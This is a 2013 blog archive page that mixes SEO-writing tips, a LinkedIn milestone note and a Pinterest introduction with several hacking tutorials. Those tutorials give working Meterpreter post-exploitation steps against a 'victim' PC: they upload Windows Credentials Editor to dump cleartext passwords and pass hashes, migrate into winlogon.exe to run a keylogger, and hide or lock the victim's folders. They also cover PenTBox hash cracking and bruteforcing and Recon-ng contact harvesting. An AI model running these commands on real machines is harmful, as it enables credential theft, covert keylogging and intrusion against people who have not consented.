Wednesday, February 13, 2013

How to introduce SEO friendly content

Your site’s content not only has to be informative and interesting, but it also has to be created in such a manner that search engines notice it. You require lot of skills to create SEO-friendly content. The text of your web page serves as the main data that search engine crawlers use to categorize the web. The more interesting and informative is your blog content, the more people will read and refer it to their friends and followers. Here are the tips on how to create SEO-friendly content.


Keep your content simple
While you are creating content with SEO in mind, it’s equally important to keep the content simple so that it is easy to read and understand for an average internet user. Don’t try to confuse casual readers with technical jargon and complex techniques.
Give out good links
Search engines often scan your content for the links to other industry association websites. A good and reliable content should include proper attribution and links. Give out good links to authoritative sites like Wikipedia.com. Include the reliable sources from which you have retrieved the data. Also, make sure to give credit to the original authors. All these, help you to earn back links.
Discover the hot topics
You can take the help of social media and social media monitoring tools to discover the trends. Google Alerts, Twitter, Google Trends and Technorati are some of the best sites that provide your company with the necessary resources to discover the trends. You can incorporate these trends into your content. Search for the topics on the web that have not been written about. Use such topics to create content and present it in a simple and understandable manner so that people will like to share.
Make sure your content is error-free
Creating a good content is not just about an interesting topic; it’s about error-free writing. Before posting your content makes sure to check your content for spelling and grammatical errors. Get it revised and checked thoroughly by a couple of authorized persons.
Use Inverted pyramid style of writing
Break up your content. It’s always a good idea to organize the content on your page. Instead of presenting a long one page text that is boring, break up that text into short paragraphs. Each paragraph should have its own headings and subheading. The first part of the paragraph should be an introductory paragraph and contain rich information. This is followed by the main theme of the story and conclusion at the end. This style of writing is called as “inverted pyramid” style. This makes it easy for search crawlers and readers to grab the information they want on your page.
Keyword placement
Keywords are the important terms that readers use in the search engines to find something. You can take help of Google tools or other free tools to work out what your main keywords are, how popular they are and how many competitive websites are using the terms as keywords? Once you have worked out with them, use keywords in your title, in the beginning of the first and last paragraphs of your content.
Use related keywords
Also, make sure the keywords used are related to your content. For instance, your main keyword is about “different types of parenting” it expects to see words about strict parenting, authoritative parenting, authoritive parenting and so on. “Google External Keyword tool” or “Google Suggest” provide you with other keywords that readers use, to make you write better content. If your keywords are not related to your content, search engines won’t display that page as part of the related search results.
Avoid keyword stuffing
Keyword density is determined by dividing the number of times the keyword used in the content by the word length of your content. For instance, if your keyword appears 10 times in a 1000 word article then your keyword density is 10/1000 = 1%. Your keyword density should be in the range 1% to 2%. If your keywords cross this range then SEO search engine bots identify them and harm your rankings or sometimes lead to a blacklist. Hence, you need to use them wisely.
Enhance your content with images and videos
Enhance your content management with SEO optimized images, videos and illustrations. This can as well drive traffic from Google images and Youtube.com to your website.
Length matters
The major search engines expect your content to be more than 300 words per page. Google prefers 950 words per page to display them in top ten search results while for Yahoo the average number of words is about 1,300.
Follow these tips and create SEO-friendly content which brings traffic to your website.
About The Author: Brianne is a writer. She loves writing, traveling and playing games. She contributes for betaout.com

Tuesday, February 12, 2013

LinkedIn reached a new milestone: 200 million members | I am one of the top 5% most viewed LinkedIn profiles for 2012

LinkedIn reached a new milestone: 200 million members

Amarjit, congratulations! You have one of the top 5% most viewed LinkedIn profiles for 2012!




Friday, February 8, 2013

How to get windows passwords in plain text?


Windows Credentials Editor (WCE) is a security tool that allows to list Windows logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes, Kerberos tickets and cleartext passwords).

The tool allows users to:
  • Perform Pass-the-Hash on Windows
  • 'Steal' NTLM credentials from memory (with and without code injection)
  • 'Steal' Kerberos Tickets from Windows machines
  • Use the 'stolen' kerberos Tickets on other Windows or Unix machines to gain access to systems and services
  • Dump cleartext passwords stored by Windows authentication packages
WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing.
After hack remote computer upload wce to victim computer using metasploit
(1)Type following command in meterpreter session.
Upload /pentest/passwords/wce/wce.exe .
(2)Now type shellto get cmd of victim pc
(3)Type wce.exe -wto get password in clear text


List NTLM credentials in memory?


By default, WCE lists NTLM credentials in memory, no need to specify any options.
For example:
C:\Users\test>wce.exe

How to Change my current NTLM credentials?


wce.exe -s <username>:<domain>:<lmhash>:<nthash>
For example:
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
Changing NTLM credentials of current logon session (00024E1Bh) to:
Username: testuser
domain: amplialabs
LMHash: 01FC5A6BE7BC6929AAD3B435B51404EE
NTHash: 0CB6948805F797BF2A82807973B89537
NTLM credentials successfully changed!



How to Create a new logon session and launch a program with new NTLM credentials?

wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c <program>
For example:
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 -c cmd.exe


How to generate NTLM hashes with WCE? 

wce.exe -g <cleartext password>
For example:
C:\Users\test>wce.exe -g mypassword
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Password: mypassword
Hashes: 74AC99CA40DED420DC1A73E6CEA67EC5:A991AE45AA987A1A48C8BDC1209FF0E7 

If you want to know more about how its work , Download P.D.F. file from Below.
(1)P.D.F -1
(2)P.D.F.-2

If you only need clear text password not logon sessions and any other
you can use mimikatz to get clear text password.


Monday, February 4, 2013

Pentbox installation & use:-


PenTBox is a Security Suite that packs security and stability testing oriented tools for networks and systems.Programmed in Ruby and oriented to GNU/Linux systems, but compatible with Windows, MacOS and every systems where Ruby works.

Main Features:-
- Cryptography tools
  • Base64 Encoder & Decoder
  • Multi-Digest (MD5, SHA1, SHA256, SHA384, SHA512, RIPEMD-160)
  • Hash Password Cracker (MD5, SHA1, SHA256, SHA384, SHA512, RIPEMD-160)
  • Secure Password Generator


- Network tools
  • Net DoS Tester
  • TCP port scanner
  • Honeypot
  • Fuzzer
  • DNS and host gathering
  • MAC address geolocation (samy.pl)


- Web
  • HTTP directory bruteforce
  • HTTP common files bruteforce


How to install pentbox?

As mention earlier this framework is compatible in any system where ruby works.
So you have to install ruby in your system to use this tool.

svn co https://pentbox.svn.sourceforge.net/svnroot/pentbox/trunk/ pentbox

cd pentbox

svn update

./pentbox.rb


pentbox-1

Cryptography tool:-
web application penetration tests we often discover encoded Base64 strings. Such strings can contain important information that’s why we need to have a decoder in our tool repository.

If in some situation we obtain password in hash form , then pentbox has inbuilt module that can crack hash into plain text , it can also encrypt plain text in hash form. Supported hash are MD5, SHA1, SHA256, SHA384, SHA512, RIPEMD-160.

pentbox-2

Network tools:-
Available modules are Net DoS Tester TCP port scanner ,Honeypot,Fuzzer,DNS and host gathering,MAC address geolocation . For tcp port scan you should use NMAP , because it `s best tool for port scanning.
I like DNS and host gathering modules. It `s very fast & responsive.

pentbox-3

Web tools:-
This section contain two tools for information gathering.
HTTP directory brute-force (You can find directory of website)
HTTP common files brute-force .

Sunday, February 3, 2013

Metasploit Post Exploitation Methods

(A)Hide File in victim `s P.C:-

After successfully got meterpreter sessions you can hide any file in victim `s P.C. Type following attribute.

attrib +h +r +s drivename:/Foldername

For example you want to hide folder name “songs” in F drive then just type following command in your terminal.

shell

attrib +h +r +s F:/songs

For unhidden file attrib -h -r -s F:/songs

(B)Get passwords of remote windows P.C:-

After getting meterpreter session type ps command it will display list of running process. Now we should migrate meterpreter session to any running process with their process i.d.

In this example we will migrate meterpreter session to winlogon.exe which process i.d. Is 600.

Type following command in your terminal.

migrate 600

Keyscan_start – to start the keylogger

Keyscan_dump – to print captured keystrokes

Keyscan_stop – to stop the keylogger

(C)Remote Windows password in plain text :-

Type following command in your meterpreter session.

Upload /pentest/passwords/wce/wce.exe

shell

wce.exe -w

(D)Lock Folder in Remote P.C. :-

After getting meterpreter  session type following command.

Cacls (Folder Name) /e /p everyone:n

This will lock your folder.

For unlock

Cacls (Folder Name) /e /p everyone:f

Here is more method of post exploitation.

Saturday, February 2, 2013

A Brief Introduction To Pinterest | By Chintan Gurjar

What is pinterest?
-> It is same like your stitch board. This is virtual stitch board. It allows to organize and share beautiful things. That we find on internet. People can create their own pinboards in which they plan their weddings, decorate their homes and organize their favourite recipes. Also much more can be done with the help of pinterest.
-> we can surf pinboards created by different peoples.
It gives fun with information and knowledge.

Why we should be on pinterest?
-> Estimated unique visitors of pinterest is increased by 429% from september to december 2011. It has quickly became the most popular media. It has also left behind google+ in just 4 month.


Mission Of Pinterest
-> The goal of pinterest is connecting the world through the "things", which they find interesting.
Pretty obvious goal.

Video Tutorial



Tips To Use Pinterest

  • Promote your lifestyle.
  • Be Nice.
  • Credit the source.
  • Avoid self promotion.
  • Inspire your team
  • Run Contests.
  • Report Objectionable Content
  • Feedback.


Friday, February 1, 2013

How to install & use Recon-ng?


Recon-ng is a true framework whose interface is modeled after the very popular and powerful Metasploit Framework. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.


-->
Recon-ng is not intended to compete with any existing framework, as it was designed exclusively for web-based reconnaissance. recon-ng which can perform web-based reconnaissance and it can be used in social engineering engagements or for extracting information that exists on the web.

How to install Recon-ng ?
cd recon-ng
./recon-ng.py

Discovering Contact with help of Recon-ng?
type help in the framework in order to see a list with all the available commands.

Recon-ng-1


-->
We can see that there is a command named modules.We will type that command to check the existing modules that we can use.In the next image you can see a sample of the available modules.
Recon-ng-2

-->
Here is a module called contacts_jigsaw. Jigsaw is a website similar to Linkedin that contains a large database of business contacts. So let’s say that we want to discover the contacts of a company that exists on jigsaw. We will load the module with the command load contacts_jigsaw and we will set the domain of our preference.
Recon-ng-3
-->
Discover additional Domain of same company?
we can try to use the Google module to discover additional domains of the same company. In this example I am using netcraft modules.

Recon-ng-4

-->
Recon-ng gives us also the ability to extract the results in CSV format or in an HTML file.
Recon-ng-5


-->
This tool is really simple to use and it holds every result in its database for later use.The report that generates is well formatted and if in the future additional modules will added on the framework.